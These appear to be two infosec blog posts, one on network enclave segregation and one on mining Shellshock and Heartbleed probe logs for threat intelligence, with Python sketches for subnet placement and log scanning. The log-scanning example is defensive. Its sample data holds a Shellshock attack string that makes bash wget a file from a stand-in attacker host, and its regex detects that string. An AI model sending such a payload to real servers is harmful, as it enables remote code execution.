Thursday, January 1, 2015

Horizontal versus Vertical Network Segregation

Traditionally, we have looked at security from a "ring" perspective.  This shouldn't be surprising, given that since the beginning of time, humans have created rings for safety.  The moat and the castle, especially on a hill, meant safety.

So, we have the same situation in infosec.   If we create a perimeter, then ostensibly, we have security. 

However, in today's networked world, we have numerous ways in which our perimeter gets stretched: AWS instances, mobile devices, federated identity, BYOD - you name it.

Thinking of your network as permeable requires that you construct defenses (preventive controls) WITHIN the network - and segregating the internal network is one of those approaches.  I've written about this elsewhere, but utilizing subnets for mission-critical infrastructure, sensitive data, and other important assets, and protecting those "enclaves," is a valid strategy.

This is akin to the "tiering" approach for web applications, where web servers reside in the DMZ and are separated from middleware/business logic layers and data stores.  I think of this as "horizontal segregation"  where the function of the asset dictates its placement in an enclave.  So a data store layer that has your databases in a secure segregated enclave would be a good example.  
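To make the enclave idea concrete, here is a minimal sketch in Python using the standard `ipaddress` module.  The subnet addresses and enclave names are purely illustrative assumptions, not taken from any real deployment - the point is simply that an asset's function (web, middleware, data store) maps to a network segment:

```python
import ipaddress

# Hypothetical enclave subnets for a tiered layout (example addresses only):
# web servers in the DMZ, middleware in its own segment, and data stores
# in a tightly restricted enclave.
ENCLAVES = {
    "dmz-web":    ipaddress.ip_network("10.0.10.0/24"),
    "middleware": ipaddress.ip_network("10.0.20.0/24"),
    "data-store": ipaddress.ip_network("10.0.30.0/24"),
}

def enclave_of(host_ip):
    """Return the enclave a host belongs to, or None if it is unplaced."""
    addr = ipaddress.ip_address(host_ip)
    for name, network in ENCLAVES.items():
        if addr in network:
            return name
    return None

# A database server at 10.0.30.15 lands in the data-store enclave;
# a host outside all three subnets belongs to no enclave.
print(enclave_of("10.0.30.15"))
print(enclave_of("192.168.1.5"))
```

In practice, the firewall rules between these segments - not the lookup itself - do the enforcing; this sketch just shows the placement logic that function-based segregation implies.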

But - how about vertical segregation?   If we assume that applications have multiple tiers internally, does layer 3/4 segregation mean anything anymore?  We all know that firewalls and network layer controls are ineffective against web application attacks.   The application allows us to interact with it over port 80/443 and allows us to touch the data store in the "back end".

From my perspective, providing security for hosting/data center solutions, vertical segregation is how we keep multiple tenants from touching each other's data.   It also has the effect of isolating a particular service, website, or web application from OTHER services, websites, or web applications.

So how do we enable communication between hosts in the back end then?  Do we provide a management backplane of connectivity that allows data to flow between endpoints?  Or can we force all data transfers out the front door to our edge router, which then sends it to application B's "front end?"

Food for thought?


Threat intelligence, Part 2

This year has been very interesting in terms of massive, critical vulnerabilities in some of the fundamental technologies and protocols that underpin the Internet (Heartbleed and POODLE) and in some of the foundational software packages that comprise our computing platforms (Bash - Shellshock).

As a practitioner who has had to scramble around to patch these systems, some interesting artifacts have arisen which got me thinking about threat intelligence.  In addition to patching machines, we were aware that some of these vulnerabilities had been around for some time before public disclosure.   Even after public disclosure, there was a window before patches were available for all of the affected platforms an enterprise might have in its environment.

Which leads me to this:   these types of vulnerabilities can potentially serve as a way to identify your adversaries.   Think of it - if you have an adversary who wants to get into your network and a vulnerability like Heartbleed or Shellshock becomes known, don't you think they want to probe you immediately, to see if they can use the window between disclosure and patch to compromise your systems?

From a vulnerability management perspective, this is why compensating controls are so important.   You must protect yourself while you are waiting for that patch.

However, I would make the point that it is extremely important to also log any attempts to take advantage of the vulnerability in as verbose a fashion as possible.  If you have the choice of two different compensating controls and one gives you a better view/more intelligence about the attacking party, choose that one (actually, choose both!).

Different types of attacks can provide more detailed intelligence on your attackers

Heartbleed didn't really give us much in the way of telemetry about our attackers, mostly because in the early period after the disclosure, there wasn't a good way of detecting probes.  Later, there were some signatures for IDS.   At best, you'd get some idea of the IP addresses that were probing you. And as we all know, IP does not provide strong attribution.   Using it to identify your adversaries is not a winning strategy.

Shellshock gave us a lot more to go on.   Attackers had to craft "attack strings" to take advantage of the vulnerability, and these strings appeared in web logs.  Reviewing logs could give us some idea of the attacker's approach:

Tool repositories
Preferred commands
Desired targets - both hosts and the files on them
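A log review like this can be sketched in a few lines of Python.  Shellshock attack strings embed a Bash function definition - the telltale `() {` marker - followed by the commands the attacker wants executed, and these typically land in request-header fields of an Apache-style access log.  The sample log lines below are illustrative, using documentation-reserved IP addresses and a made-up download URL, not real observed traffic:

```python
import re

# Shellshock exploit attempts contain a Bash function definition, "() {",
# followed by attacker-chosen commands.  This marker is the simplest thing
# to scan for in web server logs.
SHELLSHOCK_MARKER = re.compile(r"\(\)\s*\{")

def extract_attempts(log_lines):
    """Yield (source_ip, raw_line) for lines carrying a Shellshock string."""
    for line in log_lines:
        if SHELLSHOCK_MARKER.search(line):
            # In combined log format, the first field is the client IP.
            source_ip = line.split()[0]
            yield source_ip, line

# Illustrative log lines (example IPs and URL, not real traffic):
sample = [
    '203.0.113.9 - - [25/Sep/2014:06:00:00 +0000] "GET /cgi-bin/test.cgi '
    'HTTP/1.1" 200 - "() { :;}; /bin/bash -c \'wget http://evil.example/x\'"',
    '198.51.100.4 - - [25/Sep/2014:06:01:00 +0000] '
    '"GET /index.html HTTP/1.1" 200 -',
]

for ip, line in extract_attempts(sample):
    print(ip)
```

From the matched lines you can then pull out exactly the artifacts listed above: the URLs attackers fetch tools from, the commands they prefer, and the hosts and files they go after.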

Now, these are the kinds of Tactics, Techniques, and Procedures that provide better identification of your attackers.